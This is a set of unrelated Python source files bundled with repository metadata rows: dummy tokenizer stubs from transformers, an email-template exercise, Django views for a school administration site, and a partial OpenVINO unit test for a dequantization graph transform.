| ["Apache-2.0"] | null | null | null
| src/transformers/utils/dummy_tokenizers_objects.py
| Yokohide0317/transformers
| 1089c30a4a3c56dcf017e500ba4b44e5c39f68dd
| ["Apache-2.0"] | null | null | null
|
# This file is autogenerated by the command `make fix-copies`, do not edit.
# flake8: noqa
from ..file_utils import DummyObject, requires_backends
class AlbertTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class BartTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class BarthezTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class BertTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class BigBirdTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class BlenderbotTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class BlenderbotSmallTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class CamembertTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class CLIPTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class ConvBertTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class DebertaTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class DistilBertTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class DPRContextEncoderTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class DPRQuestionEncoderTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class DPRReaderTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class ElectraTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class FNetTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class FunnelTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class GPT2TokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class HerbertTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class LayoutLMTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class LayoutLMv2TokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class LayoutXLMTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class LEDTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class LongformerTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class LxmertTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class MBartTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class MBart50TokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class MobileBertTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class MPNetTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class MT5TokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class OpenAIGPTTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class PegasusTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class RealmTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class ReformerTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class RemBertTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class RetriBertTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class RobertaTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class RoFormerTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class SplinterTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class SqueezeBertTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class T5TokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class XLMRobertaTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class XLNetTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])

class PreTrainedTokenizerFast(metaclass=DummyObject):
    _backends = ["tokenizers"]

    def __init__(self, *args, **kwargs):
        requires_backends(self, ["tokenizers"])
| 25.100313
| 75
| 0.692519
| 697
| 8,007
| 7.56528
| 0.106169
| 0.139579
| 0.238953
| 0.324294
| 0.801252
| 0.801252
| 0.801252
| 0.801252
| 0.801252
| 0.801252
| 0
| 0.001055
| 0.171225
| 8,007
| 318
| 76
| 25.179245
| 0.79355
| 0.010741
| 0
| 0.745856
| 1
| 0
| 0.113665
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.248619
| false
| 0
| 0.005525
| 0
| 0.751381
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 12
|
48980b32d470be8627222c14e21285de3040220d
| 922
|
py
|
Python
|
Ch_7_Mangle Data Like a Pro/7_5.py
|
brianchiang-tw/Introducing_Python
|
557fcddb6329741a177d6ee1d24122b36e106235
|
[
"MIT"
] | 1
|
2020-07-21T08:34:08.000Z
|
2020-07-21T08:34:08.000Z
|
Ch_7_Mangle Data Like a Pro/7_5.py
|
brianchiang-tw/Introducing_Python
|
557fcddb6329741a177d6ee1d24122b36e106235
|
[
"MIT"
] | null | null | null |
Ch_7_Mangle Data Like a Pro/7_5.py
|
brianchiang-tw/Introducing_Python
|
557fcddb6329741a177d6ee1d24122b36e106235
|
[
"MIT"
] | null | null | null |
email_template = \
'''
Dear {salutation} {name},
Thank you for your letter. We are sorry that our {product} {verbed} in your
{room}. Please note that it should never be used in a {room}, especially
near any {animals}.
Send us your receipt and {amount} for shipping and handling. We will send
you another {product} that, in our test, is {percent}% less likely to
have {verbed}.
Thank you for your support
Sincerely,
{spokesman}
{job_title}
'''
# expected output:
'''
Dear {salutation} {name},
Thank you for your letter. We are sorry that our {product} {verbed} in your
{room}. Please note that it should never be used in a {room}, especially
near any {animals}.
Send us your receipt and {amount} for shipping and handling. We will send
you another {product} that, in our test, is {percent}% less likely to
have {verbed}.
Thank you for your support
Sincerely,
{spokesman}
{job_title}
'''
print(email_template)
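`print(email_template)` shows the letter with its `{placeholder}` fields still unfilled; filling it is a single `str.format` call. The values below are invented purely for illustration:

```python
values = dict(salutation='Dr.', name='Husted', product='duck vacuum',
              verbed='exploded', room='kitchen', animals='iguanas',
              amount='$1.38', percent=17, spokesman='Edgar Wott',
              job_title='Customer Apologist')
# Every {field} in the template is substituted by keyword.
print(email_template.format(**values))
```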
| 23.641026
| 75
| 0.727766
| 145
| 922
| 4.6
| 0.37931
| 0.041979
| 0.053973
| 0.068966
| 0.932534
| 0.932534
| 0.932534
| 0.932534
| 0.932534
| 0.932534
| 0
| 0
| 0.172451
| 922
| 39
| 76
| 23.641026
| 0.874181
| 0.017354
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
48eb518fdbe52c19ba8aa4fe22070f64828c14b1
| 8,851
|
py
|
Python
|
basicInfo/views.py
|
laylalaisy/Educational-Administration-System
|
1d30775cb429e6a3d7e0aff0934b38418bac6fba
|
[
"Apache-2.0"
] | 4
|
2018-07-13T04:01:09.000Z
|
2022-03-26T06:53:03.000Z
|
basicInfo/views.py
|
laylalaisy/Educational-Administration-System
|
1d30775cb429e6a3d7e0aff0934b38418bac6fba
|
[
"Apache-2.0"
] | null | null | null |
basicInfo/views.py
|
laylalaisy/Educational-Administration-System
|
1d30775cb429e6a3d7e0aff0934b38418bac6fba
|
[
"Apache-2.0"
] | 2
|
2018-07-23T14:40:28.000Z
|
2018-09-19T03:39:23.000Z
|
from django.shortcuts import render
from django.http import HttpResponseForbidden
# Create your views here.
def default(request):
    return render(request, 'basicInfo/basic_homepage.html', {})

def signup(request):
    return render(request, "basicInfo/basic_signup.html", {})

def login(request):
    return render(request, "basicInfo/basic_login.html", {})

def student(request):
    sid = request.session["account_id"]
    feedDict = {
        "account_id": sid
    }
    if request.session["type"] != 0:
        return HttpResponseForbidden()
    return render(request, "basicInfo/student_personinfo.html", feedDict)

def exam(request):
    sid = request.session["account_id"]
    feedDict = {
        "account_id": sid
    }
    if request.session["type"] != 0:
        return HttpResponseForbidden()
    return render(request, "basicInfo/student_examarrange.html", feedDict)

def calendar(request):
    sid = request.session["account_id"]
    feedDict = {
        "account_id": sid
    }
    if request.session["type"] != 0:
        return HttpResponseForbidden()
    return render(request, "basicInfo/student_calender.html", feedDict)

def courseplan(request):
    sid = request.session["account_id"]
    feedDict = {
        "account_id": sid
    }
    if request.session["type"] != 0:
        return HttpResponseForbidden()
    return render(request, "basicInfo/student_courseplan.html", feedDict)

def personalinfo(request):
    sid = request.session["account_id"]
    feedDict = {
        "account_id": sid
    }
    if request.session["type"] != 0:
        return HttpResponseForbidden()
    return render(request, "basicInfo/student_personinfo.html", feedDict)

def courseregist(request):
    sid = request.session["account_id"]
    feedDict = {
        "account_id": sid
    }
    if request.session["type"] != 0:
        return HttpResponseForbidden()
    return render(request, "basicInfo/student_courseregist.html", feedDict)

def mycourse(request):
    sid = request.session["account_id"]
    feedDict = {
        "account_id": sid
    }
    if request.session["type"] != 0:
        return HttpResponseForbidden()
    return render(request, "basicInfo/student_mycourse.html", feedDict)

def grade(request):
    sid = request.session["account_id"]
    feedDict = {
        "account_id": sid
    }
    if request.session["type"] != 0:
        return HttpResponseForbidden()
    return render(request, "basicInfo/student_grade.html", feedDict)

def coursesearch(request):
    sid = request.session["account_id"]
    feedDict = {
        "account_id": sid
    }
    if request.session["type"] != 0:
        return HttpResponseForbidden()
    return render(request, "basicInfo/student_coursesearch.html", feedDict)

def teacher(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 1:
        return HttpResponseForbidden()
    return render(request, "basicInfo/teacher_information.html", feedDict)

def teacher_index(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 1:
        return HttpResponseForbidden()
    return render(request, "basicInfo/teacher_information.html", feedDict)

def teacher_information(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 1:
        return HttpResponseForbidden()
    return render(request, "basicInfo/teacher_information.html", feedDict)

def teacher_comment(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 1:
        return HttpResponseForbidden()
    return render(request, "basicInfo/teacher_comment.html", feedDict)

def teacher_course_regist(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 1:
        return HttpResponseForbidden()
    return render(request, "basicInfo/teacher_course_regist.html", feedDict)

def teacher_course_open(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 1:
        return HttpResponseForbidden()
    return render(request, "basicInfo/teacher_course_open.html", feedDict)

def teacher_course_edit(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 1:
        return HttpResponseForbidden()
    return render(request, "basicInfo/teacher_course_edit.html", feedDict)

def school_forum(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    return render(request, "basicInfo/school_forum.html", feedDict)

def admin(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 2:
        return HttpResponseForbidden()
    return render(request, "basicInfo/admin_information.html", feedDict)

def admin_index(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 2:
        return HttpResponseForbidden()
    return render(request, "basicInfo/admin_information.html", feedDict)

def admin_information(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 2:
        return HttpResponseForbidden()
    return render(request, "basicInfo/admin_information.html", feedDict)

def admin_comment(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 2:
        return HttpResponseForbidden()
    return render(request, "basicInfo/admin_comment.html", feedDict)

def admin_course_regist(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 2:
        return HttpResponseForbidden()
    return render(request, "basicInfo/admin_course_regist.html", feedDict)

def admin_course_open(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 2:
        return HttpResponseForbidden()
    return render(request, "basicInfo/admin_course_open.html", feedDict)

def admin_course_edit(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 2:
        return HttpResponseForbidden()
    return render(request, "basicInfo/admin_course_edit.html", feedDict)

def admin_course_approve(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 2:
        return HttpResponseForbidden()
    return render(request, "basicInfo/admin_course_approve.html", feedDict)

def admin_teach_approve(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 2:
        return HttpResponseForbidden()
    return render(request, "basicInfo/admin_teach_approve.html", feedDict)

def admin_course_adjust(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 2:
        return HttpResponseForbidden()
    return render(request, "basicInfo/admin_course_adjust.html", feedDict)

def admin_teach_adjust(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 2:
        return HttpResponseForbidden()
    return render(request, "basicInfo/admin_teach_adjust.html", feedDict)

def admin_apply_approve_s(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 2:
        return HttpResponseForbidden()
    return render(request, "basicInfo/admin_apply_approve_s.html", feedDict)

def admin_apply_approve_t(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 2:
        return HttpResponseForbidden()
    return render(request, "basicInfo/admin_apply_approve_t.html", feedDict)

def admin_select_adjust(request):
    tid = request.session["account_id"]
    feedDict = {
        "account_id": tid
    }
    if request.session["type"] != 2:
        return HttpResponseForbidden()
    return render(request, "basicInfo/admin_select_adjust.html", feedDict)
| 27.746082
| 77
| 0.648966
| 924
| 8,851
| 6.058442
| 0.0671
| 0.099678
| 0.115398
| 0.170061
| 0.902465
| 0.849411
| 0.816542
| 0.816542
| 0.816542
| 0.816542
| 0
| 0.004412
| 0.231725
| 8,851
| 318
| 78
| 27.833333
| 0.818824
| 0.002599
| 0
| 0.633858
| 0
| 0
| 0.216578
| 0.129571
| 0
| 0
| 0
| 0
| 0
| 1
| 0.133858
| false
| 0
| 0.007874
| 0.011811
| 0.393701
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5b1b2ef8471154fb644a358da996c6e20c168c70
| 13,624
|
py
|
Python
|
tools/mo/unit_tests/mo/middle/dequantize_linear_resolver_test.py
|
pazamelin/openvino
|
b7e8ef910d7ed8e52326d14dc6fd53b71d16ed48
|
[
"Apache-2.0"
] | 1
|
2021-02-01T06:35:55.000Z
|
2021-02-01T06:35:55.000Z
|
tools/mo/unit_tests/mo/middle/dequantize_linear_resolver_test.py
|
pazamelin/openvino
|
b7e8ef910d7ed8e52326d14dc6fd53b71d16ed48
|
[
"Apache-2.0"
] | 58
|
2020-11-06T12:13:45.000Z
|
2022-03-28T13:20:11.000Z
|
tools/mo/unit_tests/mo/middle/dequantize_linear_resolver_test.py
|
pazamelin/openvino
|
b7e8ef910d7ed8e52326d14dc6fd53b71d16ed48
|
[
"Apache-2.0"
] | 2
|
2021-07-14T07:40:50.000Z
|
2021-07-27T01:40:03.000Z
|
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
import numpy as np
from openvino.tools.mo.middle.dequantize_linear_resolver import DequantizeLinearResolver
from openvino.tools.mo.front.common.partial_infer.utils import int64_array
from openvino.tools.mo.utils.ir_engine.compare_graphs import compare_graphs
from unit_tests.utils.graph import build_graph
from generator import generator, generate
nodes1_attributes = {
    'input': {'kind': 'op', 'op': 'AnyOp'},
    'input_data': {'kind': 'data', 'shape': None},
    'dequantize': {'kind': 'op', 'op': 'DequantizeLinear', 'axis': 1},
    'dequantize_data': {'kind': 'data', 'shape': None},
    'scale_param_dq': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
    'scale_param_dq_data': {'kind': 'data', 'shape': None},
    'zerop_param_dq': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
    'zerop_param_dq_data': {'kind': 'data', 'shape': None},
    'out': {'kind': 'op', 'op': 'AnyOp'},
    'out_data': {'kind': 'data', 'shape': None},
    'result': {'kind': 'op', 'op': 'Result'},
}

nodes_ref_attributes = {
    'input': {'kind': 'op', 'op': 'AnyOp'},
    'input_data': {'kind': 'data', 'shape': None},
    'cast': {'kind': 'op', 'op': 'Cast', 'type': 'Convert'},
    'cast_data': {'kind': 'data', 'shape': None},
    'sub': {'kind': 'op', 'op': 'Sub', 'type': 'Subtract'},
    'sub_data': {'kind': 'data', 'shape': None},
    'mul': {'kind': 'op', 'op': 'Mul', 'type': 'Multiply'},
    'mul_data': {'kind': 'data', 'shape': None},
    'scale_param_dq': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
    'scale_param_dq_data': {'kind': 'data', 'shape': None},
    'zerop_param_dq': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
    'zerop_param_dq_data': {'kind': 'data', 'shape': None},
    'out': {'kind': 'op', 'op': 'AnyOp'},
    'out_data': {'kind': 'data', 'shape': None},
    'result': {'kind': 'op', 'op': 'Result'},
    'sub_reshape_const': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
    'sub_reshape_const_data': {'kind': 'data', 'shape': None},
    'sub_reshape': {'kind': 'op', 'type': 'Reshape', 'op': 'Reshape'},
    'sub_reshape_data': {'kind': 'data', 'shape': None},
    'mul_reshape_const': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
    'mul_reshape_const_data': {'kind': 'data', 'shape': None},
    'mul_reshape': {'kind': 'op', 'type': 'Reshape', 'op': 'Reshape'},
    'mul_reshape_data': {'kind': 'data', 'shape': None},
}


class TestDequantizeLinearResolver(unittest.TestCase):
    def test_dequantize(self):
        graph = build_graph(nodes1_attributes,
                            [('input', 'input_data'),
                             ('input_data', 'dequantize'),
                             ('dequantize', 'dequantize_data'),
                             ('scale_param_dq', 'scale_param_dq_data'),
                             ('zerop_param_dq', 'zerop_param_dq_data'),
                             ('scale_param_dq_data', 'dequantize'),
                             ('zerop_param_dq_data', 'dequantize'),
                             ('dequantize_data', 'out'),
                             ('out', 'out_data'),
                             ('out_data', 'result'),
                             ],
                            {'input_data': {'shape': int64_array([1, 3, 224, 224])},
                             'scale_param_dq': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
                             'scale_param_dq_data': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
                             'zerop_param_dq': {'shape': np.array([]), 'value': np.uint8(0)},
                             'zerop_param_dq_data': {'shape': np.array([]), 'value': np.uint8(0)},
                             }, nodes_with_edges_only=True)

        graph_ref = build_graph(nodes_ref_attributes,
                                [('input', 'input_data'),
                                 ('input_data', 'cast'),
                                 ('cast', 'cast_data'),
                                 ('cast_data', 'sub'),
                                 ('zerop_param_dq', 'zerop_param_dq_data'),
                                 ('zerop_param_dq_data', 'sub'),
                                 ('sub', 'sub_data'),
                                 ('sub_data', 'mul'),
                                 ('scale_param_dq', 'scale_param_dq_data'),
                                 ('scale_param_dq_data', 'mul'),
                                 ('mul', 'mul_data'),
                                 ('mul_data', 'out'),
                                 ('out', 'out_data'),
                                 ('out_data', 'result'),
                                 ],
                                {'input_data': {'shape': int64_array([1, 3, 224, 224])},
                                 'scale_param_dq': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
                                 'scale_param_dq_data': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
                                 'zerop_param_dq': {'shape': np.array([]), 'value': np.uint8(0)},
                                 'zerop_param_dq_data': {'shape': np.array([]), 'value': np.uint8(0)},
                                 }, nodes_with_edges_only=True)

        graph.stage = 'middle'
        DequantizeLinearResolver().find_and_replace_pattern(graph)
        (flag, resp) = compare_graphs(graph, graph_ref, 'out', check_op_attrs=True)
        self.assertTrue(flag, resp)

    def test_dequantize_no_zerop(self):
        # Note: the original listing declared the ('dequantize', 'dequantize_data')
        # edge twice; the redundant duplicate is dropped here.
        graph = build_graph(nodes1_attributes,
                            [('input', 'input_data'),
                             ('input_data', 'dequantize'),
                             ('dequantize', 'dequantize_data'),
                             ('scale_param_dq', 'scale_param_dq_data'),
                             ('scale_param_dq_data', 'dequantize'),
                             ('dequantize_data', 'out'),
                             ('out', 'out_data'),
                             ('out_data', 'result'),
                             ],
                            {'input_data': {'shape': int64_array([1, 3, 224, 224])},
                             'scale_param_dq': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
                             'scale_param_dq_data': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
                             }, nodes_with_edges_only=True)

        graph_ref = build_graph(nodes_ref_attributes,
                                [('input', 'input_data'),
                                 ('input_data', 'cast'),
                                 ('cast', 'cast_data'),
                                 ('cast_data', 'mul'),
                                 ('scale_param_dq', 'scale_param_dq_data'),
                                 ('scale_param_dq_data', 'mul'),
                                 ('mul', 'mul_data'),
                                 ('mul_data', 'out'),
                                 ('out', 'out_data'),
                                 ('out_data', 'result'),
                                 ],
                                {'input_data': {'shape': int64_array([1, 3, 224, 224])},
                                 'scale_param_dq': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
                                 'scale_param_dq_data': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
                                 }, nodes_with_edges_only=True)

        graph.stage = 'middle'
        DequantizeLinearResolver().find_and_replace_pattern(graph)
        (flag, resp) = compare_graphs(graph, graph_ref, 'out', check_op_attrs=True)
        self.assertTrue(flag, resp)


@generator
class TestDequantizeWithAxis(unittest.TestCase):
    @generate(*[(int64_array([1, 3, 4, 4]), np.array([2, 3, 4, 5], dtype=np.float32),
                 np.array([2, 3, 4, 5], dtype=np.uint8), int64_array([1, 1, 4, 1]), 2),
                (int64_array([1, 3, 4, 4]), int64_array([2, 3, 4, 5]),
                 np.array([2, 3, 4, 5], dtype=np.uint8), int64_array([1, 3, 1, 1]), 1),
                (int64_array([2, 3, 4, 4]), int64_array([2, 3, 4, 5]),
                 np.array([2, 3, 4, 5], dtype=np.uint8), int64_array([2, 1, 1, 1]), 0),
                (int64_array([1, 3, 4, 4]), int64_array([2, 3, 4, 5]),
                 np.array([2, 3, 4, 5], dtype=np.uint8), int64_array([1, 1, 4, 1]), -2),
                (int64_array([1, 3, 4, 4]), int64_array([2, 3, 4, 5]),
                 np.array([2, 3, 4, 5], dtype=np.uint8), int64_array([1, 1, 1, 4]), -1),
                (int64_array([1, 3, 4, 4]), int64_array([2, 3, 4, 5]),
                 np.array([2, 3, 4, 5], dtype=np.int32), int64_array([1, 1, 4, 1]), 2),
                (int64_array([1, 3, 4, 4]), int64_array([2, 3, 4, 5]),
                 np.array([2, 3, 4, 5], dtype=np.int32), int64_array([1, 3, 1, 1]), 1),
                (int64_array([2, 3, 4, 4]), int64_array([2, 3, 4, 5]),
                 np.array([2, 3, 4, 5], dtype=np.int32), int64_array([2, 1, 1, 1]), 0),
                ])
    def test_dequantize_with_axis(self, input_shape, scale_param_value, zero_param_value, target_shape, axis):
        graph = build_graph(nodes1_attributes,
                            [('input', 'input_data'),
                             ('input_data', 'dequantize'),
                             ('dequantize', 'dequantize_data'),
                             ('scale_param_dq', 'scale_param_dq_data'),
                             ('zerop_param_dq', 'zerop_param_dq_data'),
                             ('scale_param_dq_data', 'dequantize'),
                             ('zerop_param_dq_data', 'dequantize'),
                             ('dequantize_data', 'out'),
                             ('out', 'out_data'),
                             ('out_data', 'result'),
                             ],
                            {'input_data': {'shape': input_shape},
                             'dequantize': {'axis': axis},
                             'scale_param_dq': {'shape': scale_param_value.shape,
                                                'value': scale_param_value},
                             'scale_param_dq_data': {'shape': scale_param_value.shape,
                                                     'value': scale_param_value},
                             'zerop_param_dq': {'shape': zero_param_value.shape,
                                                'value': zero_param_value},
                             'zerop_param_dq_data': {'shape': zero_param_value.shape,
                                                     'value': zero_param_value},
                             }, nodes_with_edges_only=True)

        graph_ref = build_graph(nodes_ref_attributes,
                                [('input', 'input_data'),
                                 ('input_data', 'cast'),
                                 ('cast', 'cast_data'),
                                 ('cast_data', 'sub'),
                                 ('zerop_param_dq', 'zerop_param_dq_data'),
                                 ('zerop_param_dq_data', 'sub_reshape'),
                                 ('sub_reshape_const', 'sub_reshape_const_data'),
                                 ('sub_reshape_const_data', 'sub_reshape'),
                                 ('sub_reshape', 'sub_reshape_data'),
                                 ('sub_reshape_data', 'sub'),
                                 ('sub', 'sub_data'),
                                 ('sub_data', 'mul'),
                                 ('scale_param_dq', 'scale_param_dq_data'),
                                 ('scale_param_dq_data', 'mul_reshape'),
                                 ('mul_reshape_const', 'mul_reshape_const_data'),
                                 ('mul_reshape_const_data', 'mul_reshape'),
                                 ('mul_reshape', 'mul_reshape_data'),
                                 ('mul_reshape_data', 'mul'),
                                 ('mul', 'mul_data'),
                                 ('mul_data', 'out'),
                                 ('out', 'out_data'),
                                 ('out_data', 'result'),
                                 ],
                                {'input_data': {'shape': input_shape},
                                 'scale_param_dq': {'shape': scale_param_value.shape,
                                                    'value': scale_param_value},
                                 'scale_param_dq_data': {'shape': scale_param_value.shape,
                                                         'value': scale_param_value},
                                 'zerop_param_dq': {'shape': zero_param_value.shape,
                                                    'value': zero_param_value},
                                 'zerop_param_dq_data': {'shape': zero_param_value.shape,
                                                         'value': zero_param_value},
                                 'sub_reshape_const_data': {'shape': target_shape.shape, 'value': target_shape},
                                 'mul_reshape_const_data': {'shape': target_shape.shape, 'value': target_shape},
                                 }, nodes_with_edges_only=True)

        graph.stage = 'middle'
